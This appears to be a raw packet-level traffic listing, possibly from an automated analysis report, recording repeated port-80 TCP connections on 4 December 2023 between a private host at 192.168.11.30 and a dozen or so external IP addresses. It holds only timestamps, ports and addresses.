                                                                                    Dec 4, 2023 12:07:34.374380112 CET4979780192.168.11.3054.73.26.109
                                                                                    Dec 4, 2023 12:07:34.374680042 CET4979780192.168.11.3054.73.26.109
                                                                                    Dec 4, 2023 12:07:34.559137106 CET804979754.73.26.109192.168.11.30
                                                                                    Dec 4, 2023 12:07:34.559201002 CET804979754.73.26.109192.168.11.30
                                                                                    Dec 4, 2023 12:07:34.561839104 CET804979754.73.26.109192.168.11.30
                                                                                    Dec 4, 2023 12:07:34.561902046 CET804979754.73.26.109192.168.11.30
                                                                                    Dec 4, 2023 12:07:34.562223911 CET4979780192.168.11.3054.73.26.109
                                                                                    Dec 4, 2023 12:07:34.712852001 CET8049794163.197.216.134192.168.11.30
                                                                                    Dec 4, 2023 12:07:34.713088036 CET4979480192.168.11.30163.197.216.134
                                                                                    Dec 4, 2023 12:07:35.876208067 CET4979780192.168.11.3054.73.26.109
                                                                                    Dec 4, 2023 12:07:36.891908884 CET4979880192.168.11.3054.73.26.109
                                                                                    Dec 4, 2023 12:07:37.076607943 CET804979854.73.26.109192.168.11.30
                                                                                    Dec 4, 2023 12:07:37.076883078 CET4979880192.168.11.3054.73.26.109
                                                                                    Dec 4, 2023 12:07:37.077152014 CET4979880192.168.11.3054.73.26.109
                                                                                    Dec 4, 2023 12:07:37.261182070 CET804979854.73.26.109192.168.11.30
                                                                                    Dec 4, 2023 12:07:37.263576031 CET804979854.73.26.109192.168.11.30
                                                                                    Dec 4, 2023 12:07:37.263638020 CET804979854.73.26.109192.168.11.30
                                                                                    Dec 4, 2023 12:07:37.264120102 CET4979880192.168.11.3054.73.26.109
                                                                                    Dec 4, 2023 12:07:37.264262915 CET4979880192.168.11.3054.73.26.109
                                                                                    Dec 4, 2023 12:07:37.448190928 CET804979854.73.26.109192.168.11.30
                                                                                    Dec 4, 2023 12:07:51.205492020 CET4979980192.168.11.3031.186.11.254
                                                                                    Dec 4, 2023 12:07:51.421225071 CET804979931.186.11.254192.168.11.30
                                                                                    Dec 4, 2023 12:07:51.421550035 CET4979980192.168.11.3031.186.11.254
                                                                                    Dec 4, 2023 12:07:51.421771049 CET4979980192.168.11.3031.186.11.254
                                                                                    Dec 4, 2023 12:07:51.637268066 CET804979931.186.11.254192.168.11.30
                                                                                    Dec 4, 2023 12:07:51.637972116 CET804979931.186.11.254192.168.11.30
                                                                                    Dec 4, 2023 12:07:51.638048887 CET804979931.186.11.254192.168.11.30
                                                                                    Dec 4, 2023 12:07:51.638470888 CET4979980192.168.11.3031.186.11.254
                                                                                    Dec 4, 2023 12:07:52.935039997 CET4979980192.168.11.3031.186.11.254
                                                                                    Dec 4, 2023 12:07:53.950654984 CET4980080192.168.11.3031.186.11.254
                                                                                    Dec 4, 2023 12:07:54.166484118 CET804980031.186.11.254192.168.11.30
                                                                                    Dec 4, 2023 12:07:54.166821003 CET4980080192.168.11.3031.186.11.254
                                                                                    Dec 4, 2023 12:07:54.166981936 CET4980080192.168.11.3031.186.11.254
                                                                                    Dec 4, 2023 12:07:54.382369041 CET804980031.186.11.254192.168.11.30
                                                                                    Dec 4, 2023 12:07:54.383419991 CET804980031.186.11.254192.168.11.30
                                                                                    Dec 4, 2023 12:07:54.383483887 CET804980031.186.11.254192.168.11.30
                                                                                    Dec 4, 2023 12:07:54.383841038 CET4980080192.168.11.3031.186.11.254
                                                                                    Dec 4, 2023 12:07:55.668664932 CET4980080192.168.11.3031.186.11.254
                                                                                    Dec 4, 2023 12:07:56.684520960 CET4980180192.168.11.3031.186.11.254
                                                                                    Dec 4, 2023 12:07:56.905081034 CET804980131.186.11.254192.168.11.30
                                                                                    Dec 4, 2023 12:07:56.905467987 CET4980180192.168.11.3031.186.11.254
                                                                                    Dec 4, 2023 12:07:56.905744076 CET4980180192.168.11.3031.186.11.254
                                                                                    Dec 4, 2023 12:07:57.126315117 CET804980131.186.11.254192.168.11.30
                                                                                    Dec 4, 2023 12:07:57.126382113 CET804980131.186.11.254192.168.11.30
                                                                                    Dec 4, 2023 12:07:57.127574921 CET804980131.186.11.254192.168.11.30
                                                                                    Dec 4, 2023 12:07:57.127645969 CET804980131.186.11.254192.168.11.30
                                                                                    Dec 4, 2023 12:07:57.127975941 CET4980180192.168.11.3031.186.11.254
                                                                                    Dec 4, 2023 12:07:58.418127060 CET4980180192.168.11.3031.186.11.254
                                                                                    Dec 4, 2023 12:07:59.433754921 CET4980280192.168.11.3031.186.11.254
                                                                                    Dec 4, 2023 12:07:59.651108027 CET804980231.186.11.254192.168.11.30
                                                                                    Dec 4, 2023 12:07:59.651382923 CET4980280192.168.11.3031.186.11.254
                                                                                    Dec 4, 2023 12:07:59.651575089 CET4980280192.168.11.3031.186.11.254
                                                                                    Dec 4, 2023 12:07:59.867490053 CET804980231.186.11.254192.168.11.30
                                                                                    Dec 4, 2023 12:07:59.869884014 CET804980231.186.11.254192.168.11.30
                                                                                    Dec 4, 2023 12:07:59.869946957 CET804980231.186.11.254192.168.11.30
                                                                                    Dec 4, 2023 12:07:59.870229959 CET4980280192.168.11.3031.186.11.254
                                                                                    Dec 4, 2023 12:07:59.870363951 CET4980280192.168.11.3031.186.11.254
                                                                                    Dec 4, 2023 12:08:00.086307049 CET804980231.186.11.254192.168.11.30
                                                                                    Dec 4, 2023 12:08:05.045958042 CET4980380192.168.11.3066.96.162.139
                                                                                    Dec 4, 2023 12:08:05.146025896 CET804980366.96.162.139192.168.11.30
                                                                                    Dec 4, 2023 12:08:05.146361113 CET4980380192.168.11.3066.96.162.139
                                                                                    Dec 4, 2023 12:08:05.146527052 CET4980380192.168.11.3066.96.162.139
                                                                                    Dec 4, 2023 12:08:05.247397900 CET804980366.96.162.139192.168.11.30
                                                                                    Dec 4, 2023 12:08:05.270065069 CET804980366.96.162.139192.168.11.30
                                                                                    Dec 4, 2023 12:08:05.270134926 CET804980366.96.162.139192.168.11.30
                                                                                    Dec 4, 2023 12:08:05.270410061 CET4980380192.168.11.3066.96.162.139
                                                                                    Dec 4, 2023 12:08:06.650572062 CET4980380192.168.11.3066.96.162.139
                                                                                    Dec 4, 2023 12:08:07.666384935 CET4980480192.168.11.3066.96.162.139
                                                                                    Dec 4, 2023 12:08:07.768846035 CET804980466.96.162.139192.168.11.30
                                                                                    Dec 4, 2023 12:08:07.769134998 CET4980480192.168.11.3066.96.162.139
                                                                                    Dec 4, 2023 12:08:07.769362926 CET4980480192.168.11.3066.96.162.139
                                                                                    Dec 4, 2023 12:08:07.869585991 CET804980466.96.162.139192.168.11.30
                                                                                    Dec 4, 2023 12:08:07.883236885 CET804980466.96.162.139192.168.11.30
                                                                                    Dec 4, 2023 12:08:07.883306980 CET804980466.96.162.139192.168.11.30
                                                                                    Dec 4, 2023 12:08:07.883625031 CET4980480192.168.11.3066.96.162.139
                                                                                    Dec 4, 2023 12:08:09.275104046 CET4980480192.168.11.3066.96.162.139
                                                                                    Dec 4, 2023 12:08:10.290663004 CET4980580192.168.11.3066.96.162.139
                                                                                    Dec 4, 2023 12:08:10.393472910 CET804980566.96.162.139192.168.11.30
                                                                                    Dec 4, 2023 12:08:10.393776894 CET4980580192.168.11.3066.96.162.139
                                                                                    Dec 4, 2023 12:08:10.394123077 CET4980580192.168.11.3066.96.162.139
                                                                                    Dec 4, 2023 12:08:10.494537115 CET804980566.96.162.139192.168.11.30
                                                                                    Dec 4, 2023 12:08:10.494601965 CET804980566.96.162.139192.168.11.30
                                                                                    Dec 4, 2023 12:08:10.512509108 CET804980566.96.162.139192.168.11.30
                                                                                    Dec 4, 2023 12:08:10.512597084 CET804980566.96.162.139192.168.11.30
                                                                                    Dec 4, 2023 12:08:10.512860060 CET4980580192.168.11.3066.96.162.139
                                                                                    Dec 4, 2023 12:08:11.899410009 CET4980580192.168.11.3066.96.162.139
                                                                                    Dec 4, 2023 12:08:12.915030956 CET4980680192.168.11.3066.96.162.139
                                                                                    Dec 4, 2023 12:08:13.015496969 CET804980666.96.162.139192.168.11.30
                                                                                    Dec 4, 2023 12:08:13.015697002 CET4980680192.168.11.3066.96.162.139
                                                                                    Dec 4, 2023 12:08:13.015963078 CET4980680192.168.11.3066.96.162.139
                                                                                    Dec 4, 2023 12:08:13.116944075 CET804980666.96.162.139192.168.11.30
                                                                                    Dec 4, 2023 12:08:13.139214039 CET804980666.96.162.139192.168.11.30
                                                                                    Dec 4, 2023 12:08:13.139278889 CET804980666.96.162.139192.168.11.30
                                                                                    Dec 4, 2023 12:08:13.139734983 CET4980680192.168.11.3066.96.162.139
                                                                                    Dec 4, 2023 12:08:13.139791965 CET4980680192.168.11.3066.96.162.139
                                                                                    Dec 4, 2023 12:08:13.445929050 CET4980680192.168.11.3066.96.162.139
                                                                                    Dec 4, 2023 12:08:13.549896002 CET804980666.96.162.139192.168.11.30
                                                                                    Dec 4, 2023 12:08:18.988439083 CET4980780192.168.11.30203.175.9.19
                                                                                    Dec 4, 2023 12:08:19.339315891 CET8049807203.175.9.19192.168.11.30
                                                                                    Dec 4, 2023 12:08:19.339754105 CET4980780192.168.11.30203.175.9.19
                                                                                    Dec 4, 2023 12:08:19.339960098 CET4980780192.168.11.30203.175.9.19
                                                                                    Dec 4, 2023 12:08:19.690248966 CET8049807203.175.9.19192.168.11.30
                                                                                    Dec 4, 2023 12:08:19.690722942 CET8049807203.175.9.19192.168.11.30
                                                                                    Dec 4, 2023 12:08:19.690759897 CET8049807203.175.9.19192.168.11.30
                                                                                    Dec 4, 2023 12:08:19.690782070 CET8049807203.175.9.19192.168.11.30
                                                                                    Dec 4, 2023 12:08:19.690936089 CET4980780192.168.11.30203.175.9.19
                                                                                    Dec 4, 2023 12:08:20.850636005 CET4980780192.168.11.30203.175.9.19
                                                                                    Dec 4, 2023 12:08:21.866482973 CET4980980192.168.11.30203.175.9.19
                                                                                    Dec 4, 2023 12:08:22.223330975 CET8049809203.175.9.19192.168.11.30
                                                                                    Dec 4, 2023 12:08:22.223613024 CET4980980192.168.11.30203.175.9.19
                                                                                    Dec 4, 2023 12:08:22.224276066 CET4980980192.168.11.30203.175.9.19
                                                                                    Dec 4, 2023 12:08:22.580739021 CET8049809203.175.9.19192.168.11.30
                                                                                    Dec 4, 2023 12:08:22.580862999 CET8049809203.175.9.19192.168.11.30
                                                                                    Dec 4, 2023 12:08:22.580887079 CET8049809203.175.9.19192.168.11.30
                                                                                    Dec 4, 2023 12:08:22.580998898 CET8049809203.175.9.19192.168.11.30
                                                                                    Dec 4, 2023 12:08:22.581214905 CET4980980192.168.11.30203.175.9.19
                                                                                    Dec 4, 2023 12:08:22.581254959 CET4980980192.168.11.30203.175.9.19
                                                                                    Dec 4, 2023 12:08:23.724932909 CET4980980192.168.11.30203.175.9.19
                                                                                    Dec 4, 2023 12:08:24.740498066 CET4981280192.168.11.30203.175.9.19
                                                                                    Dec 4, 2023 12:08:25.105396986 CET8049812203.175.9.19192.168.11.30
                                                                                    Dec 4, 2023 12:08:25.105668068 CET4981280192.168.11.30203.175.9.19
                                                                                    Dec 4, 2023 12:08:25.106023073 CET4981280192.168.11.30203.175.9.19
                                                                                    Dec 4, 2023 12:08:25.471014977 CET8049812203.175.9.19192.168.11.30
                                                                                    Dec 4, 2023 12:08:25.471072912 CET8049812203.175.9.19192.168.11.30
                                                                                    Dec 4, 2023 12:08:25.471582890 CET8049812203.175.9.19192.168.11.30
                                                                                    Dec 4, 2023 12:08:25.471645117 CET8049812203.175.9.19192.168.11.30
                                                                                    Dec 4, 2023 12:08:25.471693993 CET8049812203.175.9.19192.168.11.30
                                                                                    Dec 4, 2023 12:08:25.471735954 CET8049812203.175.9.19192.168.11.30
                                                                                    Dec 4, 2023 12:08:27.630491018 CET4981680192.168.11.30203.175.9.19
                                                                                    Dec 4, 2023 12:08:27.988163948 CET8049816203.175.9.19192.168.11.30
                                                                                    Dec 4, 2023 12:08:27.988584995 CET4981680192.168.11.30203.175.9.19
                                                                                    Dec 4, 2023 12:08:27.988677025 CET4981680192.168.11.30203.175.9.19
                                                                                    Dec 4, 2023 12:08:28.346945047 CET8049816203.175.9.19192.168.11.30
                                                                                    Dec 4, 2023 12:08:28.347040892 CET8049816203.175.9.19192.168.11.30
                                                                                    Dec 4, 2023 12:08:28.347094059 CET8049816203.175.9.19192.168.11.30
                                                                                    Dec 4, 2023 12:08:28.347140074 CET8049816203.175.9.19192.168.11.30
                                                                                    Dec 4, 2023 12:08:28.347408056 CET4981680192.168.11.30203.175.9.19
                                                                                    Dec 4, 2023 12:08:28.347409010 CET4981680192.168.11.30203.175.9.19
                                                                                    Dec 4, 2023 12:08:28.347480059 CET4981680192.168.11.30203.175.9.19
                                                                                    Dec 4, 2023 12:08:28.704972029 CET8049816203.175.9.19192.168.11.30
                                                                                    Dec 4, 2023 12:08:36.394659996 CET4981780192.168.11.3066.96.162.142
                                                                                    Dec 4, 2023 12:08:36.495474100 CET804981766.96.162.142192.168.11.30
                                                                                    Dec 4, 2023 12:08:36.495879889 CET4981780192.168.11.3066.96.162.142
                                                                                    Dec 4, 2023 12:08:36.495969057 CET4981780192.168.11.3066.96.162.142
                                                                                    Dec 4, 2023 12:08:36.598742962 CET804981766.96.162.142192.168.11.30
                                                                                    Dec 4, 2023 12:08:36.599303961 CET804981766.96.162.142192.168.11.30
                                                                                    Dec 4, 2023 12:08:36.599333048 CET804981766.96.162.142192.168.11.30
                                                                                    Dec 4, 2023 12:08:36.599561930 CET4981780192.168.11.3066.96.162.142
                                                                                    Dec 4, 2023 12:08:36.599716902 CET4981780192.168.11.3066.96.162.142
                                                                                    Dec 4, 2023 12:08:36.699870110 CET804981766.96.162.142192.168.11.30
                                                                                    Dec 4, 2023 12:08:41.611916065 CET4981880192.168.11.3064.190.62.22
                                                                                    Dec 4, 2023 12:08:41.793910980 CET804981864.190.62.22192.168.11.30
                                                                                    Dec 4, 2023 12:08:41.794394970 CET4981880192.168.11.3064.190.62.22
                                                                                    Dec 4, 2023 12:08:41.794485092 CET4981880192.168.11.3064.190.62.22
                                                                                    Dec 4, 2023 12:08:41.977145910 CET804981864.190.62.22192.168.11.30
                                                                                    Dec 4, 2023 12:08:41.977220058 CET804981864.190.62.22192.168.11.30
                                                                                    Dec 4, 2023 12:08:41.977727890 CET4981880192.168.11.3064.190.62.22
                                                                                    Dec 4, 2023 12:08:43.298712969 CET4981880192.168.11.3064.190.62.22
                                                                                    Dec 4, 2023 12:08:44.314389944 CET4981980192.168.11.3064.190.62.22
                                                                                    Dec 4, 2023 12:08:44.496814013 CET804981964.190.62.22192.168.11.30
                                                                                    Dec 4, 2023 12:08:44.497255087 CET4981980192.168.11.3064.190.62.22
                                                                                    Dec 4, 2023 12:08:44.497402906 CET4981980192.168.11.3064.190.62.22
                                                                                    Dec 4, 2023 12:08:44.680454016 CET804981964.190.62.22192.168.11.30
                                                                                    Dec 4, 2023 12:08:44.680537939 CET804981964.190.62.22192.168.11.30
                                                                                    Dec 4, 2023 12:08:44.680866957 CET4981980192.168.11.3064.190.62.22
                                                                                    Dec 4, 2023 12:08:46.001280069 CET4981980192.168.11.3064.190.62.22
                                                                                    Dec 4, 2023 12:08:47.016796112 CET4982080192.168.11.3064.190.62.22
                                                                                    Dec 4, 2023 12:08:47.199182034 CET804982064.190.62.22192.168.11.30
                                                                                    Dec 4, 2023 12:08:47.199564934 CET4982080192.168.11.3064.190.62.22
                                                                                    Dec 4, 2023 12:08:47.199816942 CET4982080192.168.11.3064.190.62.22
                                                                                    Dec 4, 2023 12:08:47.382225037 CET804982064.190.62.22192.168.11.30
                                                                                    Dec 4, 2023 12:08:47.382878065 CET804982064.190.62.22192.168.11.30
                                                                                    Dec 4, 2023 12:08:47.382946968 CET804982064.190.62.22192.168.11.30
                                                                                    Dec 4, 2023 12:08:47.383363962 CET4982080192.168.11.3064.190.62.22
                                                                                    Dec 4, 2023 12:08:48.703840017 CET4982080192.168.11.3064.190.62.22
                                                                                    Dec 4, 2023 12:08:49.719786882 CET4982180192.168.11.3064.190.62.22
                                                                                    Dec 4, 2023 12:08:49.902072906 CET804982164.190.62.22192.168.11.30
                                                                                    Dec 4, 2023 12:08:49.902311087 CET4982180192.168.11.3064.190.62.22
                                                                                    Dec 4, 2023 12:08:49.902487040 CET4982180192.168.11.3064.190.62.22
                                                                                    Dec 4, 2023 12:08:50.085201025 CET804982164.190.62.22192.168.11.30
                                                                                    Dec 4, 2023 12:08:50.085267067 CET804982164.190.62.22192.168.11.30
                                                                                    Dec 4, 2023 12:08:50.085659981 CET4982180192.168.11.3064.190.62.22
                                                                                    Dec 4, 2023 12:08:50.085707903 CET4982180192.168.11.3064.190.62.22
                                                                                    Dec 4, 2023 12:08:50.268471956 CET804982164.190.62.22192.168.11.30
                                                                                    Dec 4, 2023 12:08:55.095109940 CET4982280192.168.11.3037.97.254.27
                                                                                    Dec 4, 2023 12:08:55.266045094 CET804982237.97.254.27192.168.11.30
                                                                                    Dec 4, 2023 12:08:55.266283035 CET4982280192.168.11.3037.97.254.27
                                                                                    Dec 4, 2023 12:08:55.266527891 CET4982280192.168.11.3037.97.254.27
                                                                                    Dec 4, 2023 12:08:55.437577009 CET804982237.97.254.27192.168.11.30
                                                                                    Dec 4, 2023 12:08:55.437860966 CET4982280192.168.11.3037.97.254.27
                                                                                    Dec 4, 2023 12:08:56.780097008 CET4982280192.168.11.3037.97.254.27
                                                                                    Dec 4, 2023 12:08:57.795761108 CET4982380192.168.11.3037.97.254.27
                                                                                    Dec 4, 2023 12:08:57.963587046 CET804982337.97.254.27192.168.11.30
                                                                                    Dec 4, 2023 12:08:57.963807106 CET4982380192.168.11.3037.97.254.27
                                                                                    Dec 4, 2023 12:08:57.964075089 CET4982380192.168.11.3037.97.254.27
                                                                                    Dec 4, 2023 12:08:58.131747007 CET804982337.97.254.27192.168.11.30
                                                                                    Dec 4, 2023 12:08:58.132055998 CET4982380192.168.11.3037.97.254.27
                                                                                    Dec 4, 2023 12:08:59.466845036 CET4982380192.168.11.3037.97.254.27
                                                                                    Dec 4, 2023 12:09:00.482578993 CET4982480192.168.11.3037.97.254.27
                                                                                    Dec 4, 2023 12:09:00.651807070 CET804982437.97.254.27192.168.11.30
                                                                                    Dec 4, 2023 12:09:00.652057886 CET4982480192.168.11.3037.97.254.27
                                                                                    Dec 4, 2023 12:09:00.652368069 CET4982480192.168.11.3037.97.254.27
                                                                                    Dec 4, 2023 12:09:00.822125912 CET804982437.97.254.27192.168.11.30
                                                                                    Dec 4, 2023 12:09:00.822199106 CET804982437.97.254.27192.168.11.30
                                                                                    Dec 4, 2023 12:09:00.822544098 CET4982480192.168.11.3037.97.254.27
                                                                                    Dec 4, 2023 12:09:02.153837919 CET4982480192.168.11.3037.97.254.27
                                                                                    Dec 4, 2023 12:09:03.169481039 CET4982580192.168.11.3037.97.254.27
                                                                                    Dec 4, 2023 12:09:03.345779896 CET804982537.97.254.27192.168.11.30
                                                                                    Dec 4, 2023 12:09:03.346221924 CET4982580192.168.11.3037.97.254.27
                                                                                    Dec 4, 2023 12:09:03.346555948 CET4982580192.168.11.3037.97.254.27
                                                                                    Dec 4, 2023 12:09:03.524601936 CET804982537.97.254.27192.168.11.30
                                                                                    Dec 4, 2023 12:09:03.524754047 CET804982537.97.254.27192.168.11.30
                                                                                    Dec 4, 2023 12:09:03.524852991 CET804982537.97.254.27192.168.11.30
                                                                                    Dec 4, 2023 12:09:03.524914026 CET804982537.97.254.27192.168.11.30
                                                                                    Dec 4, 2023 12:09:03.524970055 CET804982537.97.254.27192.168.11.30
                                                                                    Dec 4, 2023 12:09:03.525023937 CET804982537.97.254.27192.168.11.30
                                                                                    Dec 4, 2023 12:09:03.525062084 CET4982580192.168.11.3037.97.254.27
                                                                                    Dec 4, 2023 12:09:03.525079012 CET804982537.97.254.27192.168.11.30
                                                                                    Dec 4, 2023 12:09:03.525122881 CET4982580192.168.11.3037.97.254.27
                                                                                    Dec 4, 2023 12:09:03.525136948 CET804982537.97.254.27192.168.11.30
                                                                                    Dec 4, 2023 12:09:03.525192022 CET804982537.97.254.27192.168.11.30
                                                                                    Dec 4, 2023 12:09:03.525248051 CET804982537.97.254.27192.168.11.30
                                                                                    Dec 4, 2023 12:09:03.525279999 CET4982580192.168.11.3037.97.254.27
                                                                                    Dec 4, 2023 12:09:03.525279999 CET4982580192.168.11.3037.97.254.27
                                                                                    Dec 4, 2023 12:09:03.525636911 CET4982580192.168.11.3037.97.254.27
                                                                                    Dec 4, 2023 12:09:03.701335907 CET804982537.97.254.27192.168.11.30
                                                                                    Dec 4, 2023 12:09:03.701441050 CET804982537.97.254.27192.168.11.30
                                                                                    Dec 4, 2023 12:09:03.701546907 CET804982537.97.254.27192.168.11.30
                                                                                    Dec 4, 2023 12:09:03.701627016 CET804982537.97.254.27192.168.11.30
                                                                                    Dec 4, 2023 12:09:03.701699972 CET804982537.97.254.27192.168.11.30
                                                                                    Dec 4, 2023 12:09:03.701780081 CET804982537.97.254.27192.168.11.30
                                                                                    Dec 4, 2023 12:09:03.701777935 CET4982580192.168.11.3037.97.254.27
                                                                                    Dec 4, 2023 12:09:03.701838017 CET4982580192.168.11.3037.97.254.27
                                                                                    Dec 4, 2023 12:09:03.701858997 CET804982537.97.254.27192.168.11.30
                                                                                    Dec 4, 2023 12:09:03.701953888 CET804982537.97.254.27192.168.11.30
                                                                                    Dec 4, 2023 12:09:03.702024937 CET4982580192.168.11.3037.97.254.27
                                                                                    Dec 4, 2023 12:09:03.702029943 CET804982537.97.254.27192.168.11.30
                                                                                    Dec 4, 2023 12:09:03.702110052 CET804982537.97.254.27192.168.11.30
                                                                                    Dec 4, 2023 12:09:03.702188969 CET804982537.97.254.27192.168.11.30
                                                                                    Dec 4, 2023 12:09:03.702222109 CET4982580192.168.11.3037.97.254.27
                                                                                    Dec 4, 2023 12:09:03.702274084 CET804982537.97.254.27192.168.11.30
                                                                                    Dec 4, 2023 12:09:03.702306032 CET4982580192.168.11.3037.97.254.27
                                                                                    Dec 4, 2023 12:09:03.702333927 CET804982537.97.254.27192.168.11.30
                                                                                    Dec 4, 2023 12:09:03.702409983 CET804982537.97.254.27192.168.11.30
                                                                                    Dec 4, 2023 12:09:03.702466965 CET804982537.97.254.27192.168.11.30
                                                                                    Dec 4, 2023 12:09:03.702524900 CET4982580192.168.11.3037.97.254.27
                                                                                    Dec 4, 2023 12:09:03.702542067 CET804982537.97.254.27192.168.11.30
                                                                                    Dec 4, 2023 12:09:03.702615976 CET804982537.97.254.27192.168.11.30
                                                                                    Dec 4, 2023 12:09:03.702672958 CET804982537.97.254.27192.168.11.30
                                                                                    Dec 4, 2023 12:09:03.702719927 CET4982580192.168.11.3037.97.254.27
                                                                                    Dec 4, 2023 12:09:03.702727079 CET804982537.97.254.27192.168.11.30
                                                                                    Dec 4, 2023 12:09:03.702771902 CET4982580192.168.11.3037.97.254.27
                                                                                    Dec 4, 2023 12:09:03.702785015 CET804982537.97.254.27192.168.11.30
                                                                                    Dec 4, 2023 12:09:03.702893019 CET4982580192.168.11.3037.97.254.27
                                                                                    Dec 4, 2023 12:09:03.703049898 CET4982580192.168.11.3037.97.254.27
                                                                                    Dec 4, 2023 12:09:03.878957987 CET804982537.97.254.27192.168.11.30
                                                                                    Dec 4, 2023 12:09:03.879064083 CET804982537.97.254.27192.168.11.30
                                                                                    Dec 4, 2023 12:09:03.879125118 CET804982537.97.254.27192.168.11.30
                                                                                    Dec 4, 2023 12:09:03.879182100 CET804982537.97.254.27192.168.11.30
                                                                                    Dec 4, 2023 12:09:03.879260063 CET804982537.97.254.27192.168.11.30
                                                                                    Dec 4, 2023 12:09:03.879283905 CET4982580192.168.11.3037.97.254.27
                                                                                    Dec 4, 2023 12:09:03.879317045 CET804982537.97.254.27192.168.11.30
                                                                                    Dec 4, 2023 12:09:03.879374027 CET804982537.97.254.27192.168.11.30
                                                                                    Dec 4, 2023 12:09:03.879383087 CET4982580192.168.11.3037.97.254.27
                                                                                    Dec 4, 2023 12:09:03.879565001 CET804982537.97.254.27192.168.11.30
                                                                                    Dec 4, 2023 12:09:03.879642963 CET4982580192.168.11.3037.97.254.27
                                                                                    Dec 4, 2023 12:09:03.879676104 CET804982537.97.254.27192.168.11.30
                                                                                    Dec 4, 2023 12:09:03.879786015 CET804982537.97.254.27192.168.11.30
                                                                                    Dec 4, 2023 12:09:03.879807949 CET4982580192.168.11.3037.97.254.27
                                                                                    Dec 4, 2023 12:09:03.879905939 CET804982537.97.254.27192.168.11.30
                                                                                    Dec 4, 2023 12:09:03.879980087 CET804982537.97.254.27192.168.11.30
                                                                                    Dec 4, 2023 12:09:03.880009890 CET4982580192.168.11.3037.97.254.27
                                                                                    Dec 4, 2023 12:09:03.880037069 CET804982537.97.254.27192.168.11.30
                                                                                    Dec 4, 2023 12:09:03.880093098 CET804982537.97.254.27192.168.11.30
                                                                                    Dec 4, 2023 12:09:03.880146980 CET804982537.97.254.27192.168.11.30
                                                                                    Dec 4, 2023 12:09:03.880151033 CET4982580192.168.11.3037.97.254.27
                                                                                    Dec 4, 2023 12:09:03.880203009 CET804982537.97.254.27192.168.11.30
                                                                                    Dec 4, 2023 12:09:03.880259037 CET804982537.97.254.27192.168.11.30
                                                                                    Dec 4, 2023 12:09:03.880311966 CET804982537.97.254.27192.168.11.30
                                                                                    Dec 4, 2023 12:09:03.880322933 CET4982580192.168.11.3037.97.254.27
                                                                                    Dec 4, 2023 12:09:03.880366087 CET804982537.97.254.27192.168.11.30
                                                                                    Dec 4, 2023 12:09:03.880410910 CET4982580192.168.11.3037.97.254.27
                                                                                    Dec 4, 2023 12:09:03.880420923 CET804982537.97.254.27192.168.11.30
                                                                                    Dec 4, 2023 12:09:03.880475998 CET804982537.97.254.27192.168.11.30
                                                                                    Dec 4, 2023 12:09:03.880489111 CET4982580192.168.11.3037.97.254.27
                                                                                    Dec 4, 2023 12:09:03.880806923 CET4982580192.168.11.3037.97.254.27
                                                                                    Dec 4, 2023 12:09:03.880985022 CET4982580192.168.11.3037.97.254.27
                                                                                    Dec 4, 2023 12:09:04.056996107 CET804982537.97.254.27192.168.11.30
                                                                                    Dec 4, 2023 12:09:08.887032986 CET4982680192.168.11.30146.148.34.125
                                                                                    Dec 4, 2023 12:09:09.007826090 CET8049826146.148.34.125192.168.11.30
                                                                                    Dec 4, 2023 12:09:09.008160114 CET4982680192.168.11.30146.148.34.125
                                                                                    Dec 4, 2023 12:09:09.008347988 CET4982680192.168.11.30146.148.34.125
                                                                                    Dec 4, 2023 12:09:09.129116058 CET8049826146.148.34.125192.168.11.30
                                                                                    Dec 4, 2023 12:09:09.129849911 CET8049826146.148.34.125192.168.11.30
                                                                                    Dec 4, 2023 12:09:09.129913092 CET8049826146.148.34.125192.168.11.30
                                                                                    Dec 4, 2023 12:09:09.130402088 CET4982680192.168.11.30146.148.34.125
                                                                                    Dec 4, 2023 12:09:10.511382103 CET4982680192.168.11.30146.148.34.125
                                                                                    Dec 4, 2023 12:09:11.527008057 CET4982780192.168.11.30146.148.34.125
                                                                                    Dec 4, 2023 12:09:11.648055077 CET8049827146.148.34.125192.168.11.30
                                                                                    Dec 4, 2023 12:09:11.648394108 CET4982780192.168.11.30146.148.34.125
                                                                                    Dec 4, 2023 12:09:11.648499966 CET4982780192.168.11.30146.148.34.125
                                                                                    Dec 4, 2023 12:09:11.769663095 CET8049827146.148.34.125192.168.11.30
                                                                                    Dec 4, 2023 12:09:11.770648956 CET8049827146.148.34.125192.168.11.30
                                                                                    Dec 4, 2023 12:09:11.770740986 CET8049827146.148.34.125192.168.11.30
                                                                                    Dec 4, 2023 12:09:11.770998001 CET4982780192.168.11.30146.148.34.125
                                                                                    Dec 4, 2023 12:09:13.151376963 CET4982780192.168.11.30146.148.34.125
                                                                                    Dec 4, 2023 12:09:14.168730021 CET4982880192.168.11.30146.148.34.125
                                                                                    Dec 4, 2023 12:09:14.291358948 CET8049828146.148.34.125192.168.11.30
                                                                                    Dec 4, 2023 12:09:14.291621923 CET4982880192.168.11.30146.148.34.125
                                                                                    Dec 4, 2023 12:09:14.291930914 CET4982880192.168.11.30146.148.34.125
                                                                                    Dec 4, 2023 12:09:14.414587021 CET8049828146.148.34.125192.168.11.30
                                                                                    Dec 4, 2023 12:09:14.414668083 CET8049828146.148.34.125192.168.11.30
                                                                                    Dec 4, 2023 12:09:14.415582895 CET8049828146.148.34.125192.168.11.30
                                                                                    Dec 4, 2023 12:09:14.415663004 CET8049828146.148.34.125192.168.11.30
                                                                                    Dec 4, 2023 12:09:14.415982962 CET4982880192.168.11.30146.148.34.125
                                                                                    Dec 4, 2023 12:09:15.807172060 CET4982880192.168.11.30146.148.34.125
                                                                                    Dec 4, 2023 12:09:16.822660923 CET4982980192.168.11.30146.148.34.125
                                                                                    Dec 4, 2023 12:09:16.944865942 CET8049829146.148.34.125192.168.11.30
                                                                                    Dec 4, 2023 12:09:16.945220947 CET4982980192.168.11.30146.148.34.125
                                                                                    Dec 4, 2023 12:09:16.945385933 CET4982980192.168.11.30146.148.34.125
                                                                                    Dec 4, 2023 12:09:17.067212105 CET8049829146.148.34.125192.168.11.30
                                                                                    Dec 4, 2023 12:09:17.068785906 CET8049829146.148.34.125192.168.11.30
                                                                                    Dec 4, 2023 12:09:17.068862915 CET8049829146.148.34.125192.168.11.30
                                                                                    Dec 4, 2023 12:09:17.069314003 CET4982980192.168.11.30146.148.34.125
                                                                                    Dec 4, 2023 12:09:17.069401979 CET4982980192.168.11.30146.148.34.125
                                                                                    Dec 4, 2023 12:09:17.191356897 CET8049829146.148.34.125192.168.11.30
                                                                                    Dec 4, 2023 12:09:22.071531057 CET4983080192.168.11.3091.195.240.19
                                                                                    Dec 4, 2023 12:09:22.253267050 CET804983091.195.240.19192.168.11.30
